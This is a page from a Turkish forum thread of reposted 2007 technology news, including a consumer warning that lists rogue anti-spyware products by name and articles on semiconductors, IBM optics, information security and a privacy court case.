Arama

Internet / Bilgisayar / Teknoloji Dünyası'ndan Haberler - Sayfa 23

Güncelleme: 8 Ekim 2017 Gösterim: 249.662 Cevap: 665
vain - avatarı
vain
Ziyaretçi
10 Nisan 2007       Mesaj #221
vain - avatarı
Ziyaretçi
İNTERNETTE ÇOK VAKİT GEÇİRMEK İŞTEN ATILMA SEBEBİ...
Doç. Dr. Cevdet İlhan Günay, Adana Barosu'nun 'Avukatlar Haftası' nedeniyle düzenlediği 'İş Hukuku' konulu panelde yaptığı konuşmada 4 bin 773 sayılı İş Güvencesi Yasası ve uygulamaları hakkında bilgi verdi.
Sponsorlu Bağlantılar

Yasanın, işverene işçinin sözleşmesini feshederken geçerli neden belirtme zorunluluğu getirdiğini söyleyen Doç. Dr. Günay, teknolojik gelişmelerin getirdiği bazı davranışların da bu kapsama girdiğini söyledi. Doç. Dr. Günay, şöyle dedi: "Bir süredir hayatımızda olan cep telefonuyla, telefon işçiye bile ait olsa uzun süre konuşmak ve bunu alışkanlık haline getirmek, iş sözleşmesini feshetme gerekçesi olarak gösterilebiliyor. Aynı şekilde internette uzun süre harcayan, prn içerikli mailler atan işçi de işten çıkarılabiliyor. Bu gerekçelerle işten çıkarılanların açtıkları işe dönüş davalarını reddediyoruz."

Sahte Anti-Spyware Programlarına Dikkat! Bu yazılımların ne yaptığını kısaca anlatmak gerekirse, bilgisayarınıza kurulmalarıyla birlikte yüzlerce zararlıyı da yanlarında kuruyorlar, çok hızlı bir taramayla sisteminizde bu zararlıları bulup sizden silmek için ücret talep ediyorlar. Bu yazılımların büyük bir bölümü sistemden normal yöntemlerle kaldırılamıyorlar. Masaüstü resminizi değiştiriyorlar, sürekli açılan pop-up pencereler ile satın almanızı söylüyorlar. Haftada en az bir adet yeni sahte anti-spyware yazılımı çıkıyor ve dürüst korunma yazılımları bunlara önlem lamakda genellikle yetersiz kalabiliyorlar. Zira bu zararlı yazılımlar genellikle sisteme sızma ve gizli yollarla değil, kullanıcıların talebi üzerine kuruluyorlar.
Bunlardan kurtulmanın yöntemini çeşitli bilgi güvenliği sitelerinde bulabilirsiniz. Ancak bunların sisteme bulaşmasını önlemek tamamen sizin elinizde. Warez sitelerden uzak durun ve özellikle güvenlik yazılımları konusunda fazla meraklı olmayın. Başarısı kanıtlanmış, köklü firmaların yazılımlarını kullanmanız başınıza böyle talihsiz vakaların gelmesini önleyebilir. Spysheriff tarzı sahte anti-spyware yazılımlarına genel literatürde “Rouge Anti-Spyware” adı veriliyor. Bu yazılımların güncel listesini bu adreste bulabilirsiniz: Spyware Warrior: Rogue/Suspect Anti-Spyware Products & Web Sites
Ayırca bilmediğiniz herhangi bir güvenlik yazılımını sisteminize kurmadan önce, uzman kullanıcılardan tavsiye almalısınız. Türk ve yabancı bilgi güvenliği sitelerindeki çevrimiçi topluluklardan yardım alabilirsiniz bu konuda..

İşte bu tür yazılımların listesi;

100 Percent Anti-Spyware
1-2-3 Spyware Free
1 Click Spy Clean
#1 Spyware Killer
1stAntiVirus
2004 Adware/Spyware Remover & Blocker
about:blank 2005
AdDriller
Ad-Eliminator
AdProtector
Ad-Purge Adware & Spyware Remover
Ads Alert
ADS Adware Remover
Advanced Spyware Remover
(read note)

Adware Agent
AdwareAlert
(read note)

AdwareBazooka
Adware Cops
AdwareDelete
AdwareDeluxe
Adware Filter
(PCSafe Security Center)
Adware Finder
Adware Hitman
AdwareHunter
Adware-Nuker
AdwarePatrol
AdwarePro
AdwarePunisher
AdwareRemover
AdwareSafe
AdwareSafety
Adware Sheriff
AdwareSpy
AdWare SpyWare Blocker & Removal
Adware & Spyware Firewall
Adware/Spyware Remover
Adware Striker
AdwareTools
AdwareX
AdwareX Eliminator
Ad-Where 2005
Agent Spyware
AGuardDog Adware/Spyware Remover
AlertSpy
AlfaCleaner
Anti-Spyware Blocker
AntiSpyware Soldier
Antivirus Email
AntiVirus Gold /
AntiVirus Golden
Anti Virus Pro
Anti-Virus&Spyware
ArmorWall
BestGuardPlatinum
Botsquash
BPS Spyware & Adware Remover
Brave Sentry
CheckFlow CheckSpy & Anti Spyware 2005
CoffeeCup Spyware Remover
Consumer Identity
CyberDefender
(see note)

Doctor Adware
Doctor Adware Pro
Doctor Alex
(see note)

Easy Erase Spyware Remover
Easy SpyRemover
Easy Spyware Killer
Elimiware
Emco Malware Bouncer
ETD Security Scanner
Flobo Free Anti Spyware Clean
Freeze.com AntiSpyware
Froggie Scan
GoodbyeSpy
GuardBar
HitVirus
IC Spyware Scanner
Intelligent Spyware Cleaner
InternetAntiSpy
Internet Cleanup
InternetShield
iSpyKiller
JC Spyware Remover & Adware Killer
KaZaaP
KillAllSpyware
KillAndClean
KillSpy
MalwareScanner
MalwareWipe
MalWhere
(read note)

MaxNetShield (MNS Spyware Remover & History Eraser)
Max Privacy Protector
MicroAntivirus
MyNetProtector
MyPCTuneUp
(read note)

MySpyFreePC
NetSpyProtector
NoSpyX
Oxford Spyware Remover
PAL Emergency Response
PAL Spyware Remover
PC AdWare SpyWare Removal
PCArmor
PC Health Plan
pcOrion
(read note)

PestBot
PestProtector
PestTrap
PestWiper
Privacy Champion
Privacy Crusader
Privacy Defender
Privacy Tools 2004
(read note)

Protect Your Identity
PSGuard
PurityScan /
PuritySweep
QuickCleaner
RazeSpyware
Real AdWareRemoverGold
RegFreeze
RemedyAntiSpy
RemoveIT Pro
(read note)

Safe & Clean (Scan & Clean)
SafeWebSurfer
SamuraiSpy
Scan & Repair Utilities 2006
ScanSpyware
Scumware-Remover
SecureMyPC
Security iGuard
SlimShield
SmartSecurity
Spy-Ad Exterminator Pro
SpyAdvanced
Spy Annihilator
SpyAssassin
SpyAssault
SpyAxe
SpyBan
SpyBeware
SpyBlast
Spy-Block
SpyBlocs/eBlocs.com
SpyBouncer
SpyBurn
SpyClean
SpyCleaner
SpyContra
Spy-Control
Spy Crusher
SpyCut
SpyDeface
SpyDeleter
SpyDemolisher
SpyDestroy Pro
Spy Detector
SpyEliminator
SpyFalcon
SpyFerret
SpyFighter
SpyFirewall
SpyGuardian Pro
SpyHeal
SpyiBlock
SpyiKiller
Spyinator
Spy-Kill
SpyKiller
SpyKiller 2005
SpyKillerPro
SpyLax
SpyOnThis
SpyPry
Spy Reaper
SpyRemover
SpySheriff
SpyShield
Spy-Shield
Spy Sniper
Spy Sniper Pro
SpySpotter
Spy Stalker
Spy Striker
SpyToaster
SpyTrooper
SpyVest
SpyViper
Spyware & Adware Removal
Spyware Annihilator
SpywareAssassin
SpywareAvenger
SpywareBeGone
Spyware B1aster
Spyware Bomber
SpywareBot
SpywareCleaner
Spyware Cleaner
Spyware Cleaner & Pop-Up Blocker
Spyware Cops
Spyware C.O.P.
SpywareCrusher
Spyware Defense
Spyware Destroyer
Spyware Detector
(read note)

Spyware Disinfector
SpywareHospital
SpywareHound
Spyware Immobilizer
SpywareKill
(read note)

SpywareKilla
Spyware Medic
SpywareNo!
Spyware & Pop-Up Utility
Spyware & Pest Remover
Spyware Protection Pro
Spyware Quake
SpwareRemoval
Spyware Removal Wizard
Spyware Remover
Spyware Remover
Spyware Remover
SpywareRemover
SpywareRemover
Spyware Scrapper
Spyware Sheriff
Spyware Shield
(read note)

Spyware Slayer
Spyware Sledgehammer
Spyware Snooper
Spyware Soft Stop
Spyware Stormer
SpywareStrike
Spyware Striker Pro
Spyware-Stop
Spyware Suite 2005
SpywareTek / Spyware Removal System
Spyware Terminator
Spyware Terminator
(read note)

SpywareThis
Spyware Vanisher
Spyware Wizard
SpywareXP
SpywareZapper
SpyWiper
StopGuard
StopItBlockIt 2005
Super Spyware Remover
System Detective
SystemStable
TeoSoft Anti-Spyware
Terminexor
The Adware Hunter
The SpyGuard
The Spyware Detective
TheSpywareKiller
The Spyware Shield
The Web Shield
Titan AntiSpyware
TitanShield AntiSpyware
Top10Reviews SpyScan
True Sword
TrueWatch
Trust Cleaner
TZ Spyware Adware Remover
UControl
Ultimate Cleaner
Ultimate Defender
Ultimate Spyware-Adware Remover
UnSpyPC
VBouncer/AdDestroyer
VirusBlast
VirusGuard
VirusRescue
WareOut Spyware Remover
WebSafe Spyware Secure
WinAntiSpy 2005
WinAntiSpyware 2006
WinAntiVirus 2006
Wincleaner AntiSpyware
Winhound Spyware Remover
Winkeeper
WinSOS
WorldAntiSpy
X-Con Spyware Destroyer
X-Spyware
Xmembytes AntiSpyware
Xspyware
XSRemover
ZoneProtect AntiSpyware


netten alıntı
Son düzenleyen vain; 10 Nisan 2007 11:25 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
11 Nisan 2007       Mesaj #222
vain - avatarı
Ziyaretçi
Microsoft Amerika MVP ödülü ABH’den Yeliz Korkmaz’a
Anadolu Bilişim Hizmetleri (ABH) çalışanlarından Yeliz Korkmaz, Amerika Microsoft’un 11 yıldır düzenli olarak başarılı çalışanlara verdiği MVP ödülünü aldı.
Sponsorlu Bağlantılar

1999’dan beri bilişim sektöründe görev yapan Korkmaz, 2003 yılından bu yana Anadolu Bilişim Hizmetleri’nin İş Sistemleri Müdürlüğü Departmanı’nda çalışmakta. Korkmaz’ın ERP, CRM ve BI projelerinin gerçekleştirilmesi ve sonrasındaki destek faaliyetleri üzerine başarılı çalışmaları halen devam etmekte.

MVP (Most Valuable Professional) Hakkında

Microsoft teknoloji ve uygulamalarındaki uzmanlığı simgeliyor. MVP’ler uzmanlaştıkları alanlarda diğer Microsoft kullanıcılarına destek ve yardım sağlayabiliyor. Most Valuable Professional unvanı, Microsoft ürün ve teknolojileri hakkında uzman görüşlerini paylaşma, paylaşım platformlarına katılma ve sorunlara yüksek kalitede cevaplar verebilme yeteneğine göre veriliyor. Bu program 11 yıldan uzun süredir devam etmekte olup 81 ülkeden 3000’kadar MVP ile temsil ediliyor.


TÜRKİYE'NİN YENİ GÖZDESİ YARI İLETKEN TEKNOLOJİ
ürkiye, geleceğin en önemli teknoloji leri arasında gösterilen "yarı iletken" teknoloji sinde geldiği aşamayla göz dolduruyo r.

Dedektör, lazer, gaz analiz sensörleri, termal kameralar, gece görüş sistemler i gibi hassas cihazların yapımında ihtiyaç duyulan yarı iletken malzemele r, Gazi Üniversitesi (GÜ) bünyesindeki "Yarı İletken Teknoloji si İleri Araştırma Laboratuv arında üretiliyor.

Üniversitede 3 yıl önce faaliyete geçen laboratuv ar, özellikle
nanotekno lojide kullanılan malzemele rin üretilmesi konusunda Türkiye’yi benzer laboratuv ar örneklerinde ön sıraya taşıdı.

Devlet Planlama Teşkilatı (DPT) desteğiyle kurulan laboratuv ar, dedektör, lazer, gaz analiz sensörleri, termal kameralar, gece görüş sistemler i gibi cihazların yapımında kullanılan yarı iletken malzemele rin üretilmesi konusunda Türkiye’nin kendine yeten bir ülke olması için başladığı 3 yıllık çalışma sonucunda hedeflediği noktaya ulaştı. Böylece Türkiye, bilim ve teknoloji deki
strateji hedefleri arasında yer alan yarı iletken nano yapıların geliştirilme hedefleri ni beklentil erden daha önce yakaladı.

Laboratuv ardaki teknik donanımın dünyadaki benzerler inden hiçbir farkının olmaması, bu alanda çalışan beyinleri n yurt dışına göçünü engellerk en, ilgili alanda lisans üstü eğitim için de yurt dışına öğrenci gönderme ihtiyacını önemli ölçüde azalttı.

Ortak projeler

GÜ Fen Edebiyat Fakültesi Fizik Bölümü Başkanı Prof. Dr. Süleyman Özçelik, Türkiye’nin bilim ve teknoloji deki önceliklerinde yarı iletken teknoloji si ile nanotekno lojinin ilk sıralarda yer aldığını söyledi.

Özçelik, laboratuv arın 2001 yılında sivil ve askeri amaçlar için
geliştirilecek elektro-optik cihazların temel malzemesi olan yarı iletken malzemele rin epitaksiy el olarak üretilmesi ve bu alanda yetenekli araştırmacıların yetiştirilmesi amacıyla DPT desteğiyle kurulduğunu belirtti.

Laboratuv arlarında yıllar boyu oluşan birikimle rle çeşitli algılama
sistemler inin geliştirildiğini kaydeden Özçelik, savunma sanayiini n ihtiyaçlarına yönelik Bilkent Üniversitesi Nanotekno loji Araştırma Merkezi, ODTÜ ve ASELSAN birliktel iği ile yürütülen projelerd e de yer aldıklarını kaydetti.

Cep telefonla rından trafik lambalarına

Yarı iletken malzemele rin savunma sistemler inden, cep telefonun a, uydu sistemler inden, bilgisaya r teknoloji sine kadar pek çok uygulama alanı olduğuna dikkati çeken Özçelik, "Yarı iletken teknoloji si bugün olduğu gibi geleceğin de en önemli teknoloji lerinden biri. Otomobill erin panel aydınlatmaları, cep
telefonla rındaki aydınlatma, trafik ışıkları gibi aydınlatma ve işaretleme artık yarı iletken diyotlarl a sağlanıyor" diye konuştu.

Yarı iletken algılama sistemler inin yangınlarda gaz analizind e, sağlıkta hızlı ve doğru sıcaklık ölçümlerinde, vücut sıvısı analizler inde ve çeşitli hastalıkların teşhisinde kullanıldığını belirten Özçelik, "Teknoloji, askeri alanda da hedef belirleme ve gece görüş sistemler i gibi pek çok yerde uygulama alanı bulmaktadır" dedi.

Yarı iletken dedektör teknoloji sinden sivil alanların yanı sıra savunma, havacılık ve uzay teknoloji sinin ve bağımsız savunma sistemler inin gelişmesine katkısının büyük olduğunu anlatan Özçelik, Türkiye’de bu alanda yapılan sınırlı sayıdaki araştırma ve üretim faaliyetl erinin artırılmasının yapılacak ve desteklen ecek Ar-Ge çalışmalarına bağlı olduğunu söyledi.

Hedef: Milli Teknoloji


Yarı iletken ileri araştırma laboratuv arlarında son teknoloji ile üretilen malzemele rin son üç yıldır yapılan çalışmalar neticesin de dedektör, lazer algılama ve görüntüleme sistemler inde kullanılır hale geldiğini ifade eden Özçelik, "Laboratuv ar, hem yarı iletken malzemeyi yüksek kalitede üretebilecek hem de onun her türlü analizini yapabilec ek alt yapıya sahip. Bu yönüyle Türkiye’nin en bütünleşik laboratuv arlarından biri.Türkiye, yarı iletken malzemele r teknoloji sinde kendine yeten bir ülke olma yolunda hızla ilerliyor" diye konuştu.

Hazırladıkları yeni bir proje hakkında da bilgiler veren Özçelik, şunları kaydetti: "Hedefimiz yarı iletken lazer ve dedektör cihaz prototipl erinin geliştirilmesi. Bu tür projelerl e ilgili alanda milli teknoloji mizin geliştirilmesine katkı sağlanmakta, dışa bağımlılığımızı azaltabil ecek adımlar atılmakta ve bu alanda özgüven kazanılmasına katkı sağlanabilmektedir."

Laboratuv ar bütün araştırmacılara açık

İleri teknoloji lerin sermayede n çok nitelikli insan gücü gerektird iğine dikkati çeken Özçelik, yarı iletken teknoloji sinde 15 öğretim üyesinin rehberliğinde çok sayıda yüksek lisans ve doktora öğrencisini yetiştirdiklerini anlattı. Özçelik, şunları kaydetti: "Araştırmacı ve akademisy en yetiştirmenin yanı sıra sektörlerin Ar-Ge birimleri nin de ihtiyaçlarını karşılamayı amaçlamaktayız.

Bu ve benzeri merkezler sayesinde yarı iletken teknoloji leri alanında lisansüstü öğrenci yetiştirmek amacıyla yurt dışına öğrenci gönderme ihtiyacı da azalacaktır.

Yarı iletken teknoloji si alanında kendisini yetiştirmek isteyen üniversite mezunlarının genç fizikçi ve elektroni k mühendislerinin yüksek lisans ve doktorala rını birimimiz de yapmaları mümkündür.

Laboratuv ar, yurt dışında bu alanda çalışan ancak yeterli alt yapı
olmadığından Türkiye’ye dönemeyen bilim insanlarının da çalışabileceği bir kapı olmuştur. Bu rolü ile bu teknoloji k merkez, beyin göçünü tersine çevirme yönünde katkı sağlamaktadır."

Alt yapısı yeterli olmayan üniversitelerin bilim insanlarının da
laboratuv arlarından yararlandığını kaydeden Özçelik, bütün araştırmacıları laboratuv ardan yararlanm aya davet etti.
jelibonej8

KÖPEKLERİN BOYUNU GENLER BELİRLİYOR
Amerikalı genetikçiler, köpek cinslerin in boylarını tek bir gendeki değişikliğin belirlediğini tespit ederek, buluşlarının morfoloji k özelliklerin ve insanlard a kanser gibi hastalıkların genetik mekaniğini anlamaya yardımcı olabileceğini belirttil er.

Araştırmalarında öncelikle ağırlıkları 11 ila 34 kilo arasında değişen Portekiz su köpeklerini inceleyen bilim insanları, tüm bu cinsin DNA’larını karşılaştırarak, ayrıca küçük ve büyük cinsler arasındaki değişikliğin nedeni olan köpek gen bölgesini tanımlayarak, köpek boylarının bu kadar çeşitli olmasının sebebinin "IGF1" genindeki değişim olduğunu tespit ettiler.

IGF1’in büyüme hormonunu n üretimindeki etkisini belirleye n genetikçiler, bu gendeki bir eksikliğin küçük türlerin sorumlusu olduğunu ortaya çıkardılar.

Ön araştırmalarının ardından aralarında çihuahua, pekin, kaniş,
Saint-Bernard, danua gibi 143 ayrı ırka ait 3 bin 241 köpeğin genetik analizini yapan bilim insanları, 9 kilonun altındaki tüm köpeklerde bu gendeki değişimin aynı olduğunu tespit ettiler.

Utah Üniversitesi’nde yapılan ve sonuçları bugünkü Science dergisind e yayınlanan araştırmada, küçük köpek cinslerin de tek bir genin mutasyona uğradığını görmenin önemli olduğu belirtild i.

Amerikalı bilim insanları, genlerin köpeklerin boylarını kontrol ettiğini anlamanın, insanlard a boyun genetik olarak programla ndığı anlayışına katkısının yanı sıra, kanser gibi hastalıkların mekanizma sını öğrenmekte yardımcı olabileceğini belirtere k, IGF1 geninin prostat kanseri ile bağlantısına işaret
ettiler.


IBM DEN SÜPER HIZLI YONGA...
Prototipi üretilen yeni yonga seti ile 160 Gigabitli k verinin taşınması sadece 1 saniye zaman alıyor

ibmwo4kd4



IBM önceki gün yaptığı açıklamada, ürettiği yeni optik yonga setini duyurdu. Bunda ne var diyebilir siniz. Ama bu set saniyede 160 Gigabit'lik veri transferi ni mümkün kılıyor. Bunun anlamı da HD formatındaki videoların bir saniyede aktarılabilecek olması gerçeğini taşıyor.

Prototip olarak üretilen donanıma "optik alıcı-verici" (optical transceiv er) deniliyor . Perşembe günü Californi a'da düzenlenecek olan konferans ta tanıtımı yapılacak olan sistemde yonga seti, günümüzün bilgisaya r bileşenlerine oranla 8 kat daha hızlı çalışıyor.

Ne farkı var?

Veriler ışık darbeleri yardımıyla plastik tüplerden geçiriliyor. Günümüz teknoloji sinde ise bu işlem elektronl arın bakır kablolard an geçmesiyle sağlanıyordu. Böylece şu an için bize inanılmaz gelen hızlara ulaşmak da mümkün kılınıyor.

Dahası da var. Şimdikine oranla sekiz kat daha hızlı olmasına rağmen, çok daha düşük enerji tüketimi ve daha az ısınma da sağlanmış durumda.

Ne zaman kullanacağız?

Bakır kabloların tamamen kalkması şu aşamada imkansız olarak görülüyor. Bu nedenle yeni kart mimariler i üretmek için IBM'nin donanım üreticileriyle ortak çalışmaya başlaması gerekiyor . Böylelikle hem ufak düzenlemelere gidilip son kullanıcıların maksimum derecede faydalana bileceği ürünler ortaya çıkacak, hem de ihtiyaçlar doğru bir şekilde belirlene bilecek.

IBM bu teknoloji nin şimdi de üretilip satılabileceğini söylüyor. Ancak fiyatların 500-600$ seviyeler inde olacağını da hemen ekliyor. Fiyatların aşağı çekilmesi ve az önce bahsettiğimiz sürecin işleyip sistemler in evlerimiz e kadar ulaşması için öngörülen süre ise 4 veya 5 yıl


ads305zvh2
Son düzenleyen vain; 11 Nisan 2007 10:44 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
13 Nisan 2007       Mesaj #223
vain - avatarı
Ziyaretçi
Bilgi güvenliği süreçlerinde İK’nin önemi

Bugünün dijital ekonomi dünyasında, bilgiye güvenli kanallardan erişimi
sağlamak, hassas bilgilere erişimin yetkilendirmiş kişiler haricinde sınırlandırılması bir seçim değil zorunluluk halini alıyor. Özellikle kurumsal profil, etik, kurum içi iletişim gibi süreçlerin değerlendirmesini gerçekleştiren İK departmanları için bu durum oldukça kritik... Bilgi ve iletişimin günümüz iş hayatı ve sosyal yaşamının vazgeçilmez bir parçası haline gelmesi sonucunda internetin geniş tabanlı kullanımı, kurumların verimliliklerinin arttırması, bilginin elde edilmesi ve kullanılabilir başka bilgilere dönüşmesi konusundaki rolü de bir hayli genişledi.

Kurumlar bu süreçlerin oluşmasını hızlandırmak amacıyla her geçen gün gelişen teknolojiden biraz daha fazla yararlanıyor ve pazarlarda kendilerine rekabet üstünlüğü sağlamak amacıyla süreçlerini geliştiriyor.

İşte bu noktada, kurumların esas varlığını oluşturan ve teknolojinin kurumsal amaçlar için kullanımını gerçekleştiren “insan”, bilgi güvenliğinin en zayıf ve “kontrolü en zor” halkasını oluşturuyor. Bu konuda en kritik durum ise kurumların İnsan Kaynakları yönetiminde “güvenlik denetimi” olarak tanımlanabilecek süreçlerin ortaya çıkmasıdır.

Teknolojinin kurumlar tarafından kullanılması çoğu kez başlangıçta ön görülmeyen bir dizi anomaliyi oluşturuyor. Kurumun iş yapma şekli ve kendisini dış dünyaya bağlayan global network’ler ile iletişimin etkisiyle insan faktörü güvenlik zayıflıklarının ve tehdit mekanizmalarının ana merkezini oluşturmuştur.

Internet’in çok yaygın olarak kullanılmasına paralel olarak güvenlik açıklarının artması, davranış temelli güvenlik açıklarını oluşturan sosyal mühendislik, kimlik hırsızlığı gibi tehdit profillerini ortaya çıkartmıştır.

Kurumlar sahip oldukları birçok hassas bilginin dışarıya açık olması sonucunda ise içten ve dıştan tehdit altına girmiştir. Bu nedenle, özellikle İnsan Kaynakları yönetim süreçlerini izleyen kurumsallaşmış ya da kurumsallaşan firmalar için bu husus gün geçtikçe daha hassas bir konu haline gelmektedir.

Bugünün dijital ekonomi dünyasında, bilgiye güvenli kanallardan erişimi sağlamak, hassas bilgilere erişimin yetkilendirmiş kişiler haricinde sınırlandırılması bir seçim değil zorunluluk halini almıştır. Özellikle kurumsal profil, etik, iletişim vb. süreçlerin değerlendirmesini gerçekleştiren insan kaynakları departmanları için bu durum oldukça kritiktir.

Araştırmalar gösteriyor ki, etkili atak modelleri arasından ilk ikisi, bilgilere yetkisiz erişim ve kurum bilgilerinin çalınması üzerine gerçekleşmiştir. Yapılan araştırmaların ikinci yönü ise günümüz dünyasında geçmiş yıllara göre atakların artık yıkıcı yönünün geride kaldığını; yerine bilgi sızdırma, hırsızlığı ve istihbarat çalışmaları yönünün daha ön planda olduğunu gösteriyor.

Tehdit profilleri olarak bakıldığında ise iç tehdit %70 gibi ciddi bir güvenlik problemi olarak karşımıza çıkmaktadır. Özellikle insan kaynakları departmanları tarafından yapılan bilgilendirmelerde (formlar, kullanılan eğitimlerdeki materyaller, çalışanların kritik geçmişi ve kimlik bilgileri, maaş bilgileri, yapılan toplantı notları, e-mail içerikleri, chat vb durumlarda) kurumlar tarafından, bilgi güvenliği açısından gerekli güvenlik pratikleri uygulanmamaktadır.

Daha net örnek vermek gerekirse, örneğin toplantı güvenliğinde uyulması gereken prosedürler (Toplantı gizliliği, NDA) halen birçok kurumun İnsan Kaynakları departmanı tarafından bilinmemektedir. Çoğu zaman kritik görüşmelerin güvenlikten uzak iş yemeklerinde yapılması vb süreçler halen yaşanmaktadır. Güvenliğin çoğu zaman fiziksel denetim ya da IT yönetimi içerisindeki basit bir unsur olarak düşünülmesi birçok güvelik açığının ana kaynağıdır.

Yukarıda bahsedilen zafiyetler başlangıçta sosyal mühendislik oluşumuyla başlamakta ve devamında birçok güvenlik saldırılarının ana temasını oluşturmaktadır. Güvenlik bir süreç sorunudur; kullanılan teknolojik unsurlar sadece araçtır. Uygun politika ve prosedürlerle donatılmamış kurumlar en yüksek güvenlik teknolojilerini kullansalar dahi süreçlerin teknik olduğu kadar operasyonel ve yönetsel boyutlarına hâkim olamadıkları sürece bu veya benzer durumlarla sıkça karşılaşılacaktır. Bu nedenle kurumun asıl varlığı olan çalışanların ve onlarla katma değer oluşturan kurumların, üst yönetim kademesinden başlayarak bu hususlara hassaslıkla eğilmeleri artık bir zorunluluk halini almıştır.

Şirketlerin çoğu kez sinerjisi, çalışma şekli ve yönetimi kendiliğinden şirket kültürü ve etiği denilen genellikle pek sorgulanmayan ve denetimi de pek mümkün olmayan bir dizi güvenlik sorununu getirmektedir. 1990’lı yılların sonlarına doğru başta İngiltere olmak üzere bazı Avrupa ülkelerindeki kuruluşlar bu durumu gündeme getirerek temel bilgi güvenliği standartlarını oluşturan ISO 17799 ya da BSI 7799 olarak bilinen standardı oluşturmuşlardır. 2005 yılı ikinci yarısı itibariyle bu standart kendini genişleterek ISO 27001 halini almıştır. Bu noktada standart güvenlik suçlarının yönetiminde İnsan kaynakları’nın önemi göz ardı edilmemiş; İşçi, işveren ve kontraktor (taşeron) çalışma modellerinde güvenlik süreçleri ve ilgili prosedürler tanımlanmıştır.

Bütün bu yaklaşımlar ele alındığında 3 kavram önümüze çıkıyor;

• Gizlilik (Confidentiality)
• Bütünlük (Integrity)
• Kullanılabilirlik (Availability)

Kurumlar için gizlilik, bilginin yetkili olan kişilere ulaşılabilir ve yetkilendirilmemiş kişilere göre ulaşılamaz olma durumdur.

Bütünlük, bilginin içeriğinin kontrolünü ele alır. Bir uçtan diğerine bilgi taşınırken yetkisiz bir biçimde bozulmamasını, değiştirilmemesini ve yok edilememesini sağlar.

Kullanılabilirlik ise, bilginin kullanıma hazır ve erişilebilir olma durumudur.

Bilgi Güvenliği yaklaşımları bazen değişik bakış açıları ve yaklaşımlar içerse de uzmanlar bu 3 konsept üzerinde hem fikir olmuşlardır.

Bütün bunlardan çıkartılması gereken sonuç güvenliğin bir teknoloji sorunu olmaktan çok süreç ve iş yönetimi sorunu olduğunu kabul etmemizden geçer. Bu nedenle günümüz koşullarında kurumların esas değerini oluşturan insan varlığı ve onun bu süreçlere göre performansından ödün vermeden güvenli şekilde yönetmek, kurumun olduğu kadar çalışanlarında yararına olmaktadır.

Bu bağlamda her kurum bu yapılandırmayı sektör bağımsız olarak gelecekte gündemlerine almak zorunda kalacaklardır. Bilginin taşınabilir ve form değiştirebilir olması nedeniyle kurumlar bu yapılandırmayı er ye da geç oluşturacaktırlar. Bu bağlamda kurumların IK departmanları bu süreçlerin oluşturulmasında sınırsız sorumlu olacaktırlar.


att10tmp

İnternet Üzerinden Görüntü Yaymaya 3 Yıl Hapis
Son dönemde internet üzerinden görüntü aktarımı ve yayma işlemleri çoğaldı ama konunun bir de hukuki boyutu var. Kişisel gizlilik açısından, internet üzerinden yayılan görüntüler bir tehdit ve dolayısıyla da hukuki bir karşılığı var.

Özel hayatın gizliliğini ihlal suçundan Gökhan Demirkol ve 12 sanığın yargılandığı dava sonuçlandı. Oyuncu Gamze Özçelik'e tecavüz görüntülerini cep telefonuyla kaydedip internet üzerinden yaydığı gerekçesiyle yargılanan Gökhan Demirkol, 3 yıl hapis cezasına çarptırıldı.

Davanın diğer sanıklarından Salih Yıldırım 1 yıl 6 ay hapis cezası aldı, 11 kişi beraat etti. Kadıköy 1. Asliye Ceza Mahkemesi'nde "özel hayatın gizliliğini ihlal" suçundan haklarında 4.5 yıla kadar hapis istemiyle dava açılan Demirkol ve 12 sanığın yargılandığı davanın dün karar duruşması görüldü.

Demirkol'un avukatı Ömer Yeşilyurt, Demirkol'un savunmasını şu şekilde yaptı :

  • Raporda, görüntüleri yaydığı konusunda müvekkilim hakkında hiçbir iddia yoktur. Görüntüleri Demirkol'un çektiği doğrudur. Ancak çektikten sonra telefonun kayıtlarından silmiş, daha sonra telefonunu satmıştır. Telefon içinde saklı bulunan hafıza kartındaki görüntüleri silinmemiştir. Kendisi sildiğini zannetmiştir. Telefonu alan kişi 'telefonda virüs var' diye formatlaması için Salih Yıldırım'a vermiştir. Ancak Yıldırım görüntüleri silmemiş, dolaşıma atmıştır.

Ancak davaya bakan hâkim, fiilin yayın yoluyla işlediği gerekçesiyle Demirkol'u 3 yıl hapis cezasına çarptırdı. Demirkol, Özçelik'e tecavüz suçundan yargılandığı davada da 5 yıl 10 ay hapis cezasına çarptırılmıştı.


Albümünü internette tasarla evine basılı gelsin
Xerox, dijital fotoğraflardan kişiye özel albümler yapılmasını sağlayacak özel bir yazılım çözümünün tanıtımını yapıyor. Dünya Ticaret Merkezi Fuar Kompleksi’nde 12-15 Nisan 2007 tarihleri arasında düzenlenen Photo& Dijital 07 fuarına katılan Xerox, 10. salonda yer alan standında, iş ortağı Dijital Düşler firması ile dijital fotoğraf albüm çözümünü örnek uygulamalar ile tüketicilere tanıtıyor.

Dijital fotoğraf albümü çözümüyle kişiler ve fotoğraf stüdyoları internet üzerinden albüm tasarımı yaparak, baskıya gönderebilecekler. Geleneksel fotoğraf baskı teknolojisinden çok daha hesaplı ve pratik olarak baskı alınabilmesini sağlayacak bu çözüm, fotoğraf baskı sektörü için çok yeni bir uygulama olma özelliği taşıyor. 1 Mayıs Salı günü aktif hale gelecek olan fotografsiparis.com - Welcome! Domains, transfers, ssl certificates, whoisguard, pop3 and more. adlı internet sitesi üzerinden, kendilerine özel bir fotoğraf albümünü tasarlayabilecek ve gönderdikleri resimlerle oluşturulan özel albümü 48 saat içinde ciltlenmiş ve basılmış şekilde evlerinde teslim alacaklar.

Xerox Türkiye Üretim Sistemleri Direktörü Pelin Çağlar yaptığı açıklamada “Fotoğraf baskı sektörü büyük bir değişimi yaşıyor. Teknolojide meydana gelen gelişmeler artık fotoğraf baskısı alanında dijital baskı teknolojilerini ve getirdiği yenilikleri kullanmaya imkan veriyor. Xerox, bundan böyle dijital fotoğraf baskısıyla ilgili özel çözümleri ile de sektörde adından söz ettiriyor olacak. Xerox’un yüksek kapasiteli dijital baskı sistemlerinin teknolojik artıları ve bu makineler üzerinde çalışan özel kişiselleştirme yazılımları ile tüketicilere yönelik sıradışı uygulamalar yapılabiliyor. Xerox olarak, iş ortaklarımızla bu alanı geliştirmeye yönelik çalışmalar yapmaya devam edeceğiz”dedi.

